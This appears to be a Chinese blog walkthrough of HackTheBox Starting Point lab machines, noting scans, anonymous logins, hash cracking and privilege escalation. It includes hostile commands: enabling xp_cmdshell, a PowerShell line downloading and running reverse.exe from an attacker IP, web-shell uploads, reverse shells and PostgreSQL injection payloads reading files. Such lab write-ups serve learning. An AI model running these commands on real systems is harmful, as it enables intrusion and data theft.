有一说一,还是wsl用起来爽。vm感觉可以卸了。

Meow

先nmap扫描,因为实在太慢,所以只扫了1-500
2024-04-19T03:59:11.png
直接以root登录,没有密码
2024-04-19T04:05:32.png
2024-04-19T04:06:02.png

Fawn

nmap太慢了,所以就直接扫答案的21端口了
2024-04-24T13:05:09.png
这里ftp是可以anonymous(匿名)登录的
2024-04-24T13:34:11.png
get flag.txt看就可以了
2024-04-24T13:35:27.png

Dancing

扫到135端口
2024-04-24T13:39:56.png
再用nmap扫这个端口
2024-04-24T13:41:50.png
先用smbclient -L看靶机共享了哪些资源,这里又是没有密码
2024-04-25T00:58:51.png
然后访问下载flag.txt
2024-04-25T01:01:03.png

Redeemer

redis服务
2024-04-25T01:24:05.png
直接无密码登录
2024-04-25T01:32:48.png

Appointment

2024-04-25T01:49:46.png

Sequel

直接无密码登录
2024-04-25T01:59:52.png
2024-04-25T02:00:38.png

Crocodile

ftp匿名登录得到后台的账号和密码
2024-04-25T03:09:17.png
admin登录得到flag
2024-04-25T03:09:57.png

Responder

先扫目录
2024-04-19T06:16:28.png
直接访问会跳转到unika.htb,我们要写修改本机的/etc/hosts文件,把unika.htb绑定到我们靶机的ip,可以ssrf,但是不知道flag在哪。
2024-04-19T07:15:48.png
用responder获取哈希
2024-04-25T04:49:38.png
用john破解
2024-04-25T05:06:16.png
./evil-winrm -i 10.129.95.234 -u Administrator -p badminton连接
2024-04-25T05:50:45.png

Three

2024-04-25T07:05:31.png
爆破子域名可以发现还有个s3.thetoppers.htb,是亚马逊的什么服务,可以用awscli连接进行配置,直接copy个shell.php上去,然后就可以执行命令了。
2024-04-30T08:22:21.png

Archetype

2024-04-30T08:44:32.png
用goby重新扫了下得到以下结果
2024-08-05T13:22:51.png
首先看共享了哪些文件夹
2024-08-05T13:25:13.png
通过dir列出文件,get下载文件,得到密码
2024-08-05T13:28:25.png
成功登录mssql
2024-08-05T13:47:09.png
这里没有开启xp_cmdshell,要自己开启

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
EXEC master..xp_cmdshell 'whoami';

2024-08-05T13:49:32.png

powershell Invoke-WebRequest -Uri http://10.10.16.45:3333/reverse.exe -OutFile $env:USERPROFILE\Documents\shell.exe
powershell echo "$env:USERPROFILE\Documents"
powershell C:\Users\sql_svc\Documents\shell.exe

我直接用msf弹了个shell出来
2024-08-06T01:44:20.png
getsystem得到系统权限
2024-08-06T01:49:27.png
2024-08-06T01:48:53.png
C:\Users\Administrator\Desktop下type root.txt
2024-08-06T01:52:05.png
同理得到user.txt
2024-08-06T01:56:44.png

Oopsie

扫描得到两个端口
2024-08-06T06:59:22.png
因为网络问题扫不太出来,根据bp可以找到/cdn-cgi/login/
2024-08-07T06:55:15.png
游客登录后之后改id为1得到admin的id
2024-08-07T07:45:29.png
改cookie得到upload界面
2024-08-07T07:46:40.png
上传一个木马即可
2024-08-07T07:52:43.png
好像不能post访问,所以重新传一个get的马
2024-08-07T07:59:12.png
可能是访问过一次就把上传的文件删除了,所以这里反弹shell
2024-08-07T08:13:57.png
直接找到user.txt
2024-08-07T08:38:21.png
有robert,尝试用数据库的密码ssh连接
2024-08-07T08:44:45.png
成功连接
2024-08-07T08:51:13.png
发现robert还是bugtracker组的
2024-08-07T09:05:07.png
find / -group bugtracker查找这个组的文件,发现/usr/bin/bugtracker
2024-08-07T09:04:36.png
根据名字是一个查bug文件的,路径穿越得到root.txt
2024-08-07T09:08:29.png
看其他的wp说这里调用的是cat可以命令拼接出一个bash
2024-08-07T09:16:08.png

Vaccine

先扫到3个端口
2024-08-07T09:30:43.png
匿名登录ftp下载备份
2024-08-07T09:32:06.png
用rockyou爆破压缩包密码
2024-08-07T09:40:04.png
得到md5后的密码,somd5发现是qwerty789
2024-08-07T09:41:51.png
有sql注入
2024-08-07T09:45:53.png
sqlmap跑出了public数据库,但是没什么用
2024-08-07T10:14:15.png
得到sql shell
2024-08-07T11:02:35.png
sqlmap的总是有问题,所以我们自己注,具体参考这篇博客,先列目录
ZZ%'%20union%20select%20'1',pg_ls_dir('./../../../../www/html'),'3','4','5'--%23
2024-08-07T11:26:44.png
然后我们读ZZ%'%20union%20select%20'1',pg_read_file('./../../../../www/html/dashboard.php'),'3','4','5'--%23
2024-08-07T11:41:48.png
用数据库的用户和密码ssh连接
2024-08-07T11:46:21.png
这里是sudo提权,sudo -l 发现可以sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
2024-08-07T12:02:59.png
参考vi提权
2024-08-07T12:10:44.png
vi编辑文件的时候依次输入即可成功提权,
2024-08-07T12:10:22.png
得到root.txt
2024-08-07T12:12:29.png

Unified

先扫到4个端口
2024-08-10T05:53:00.png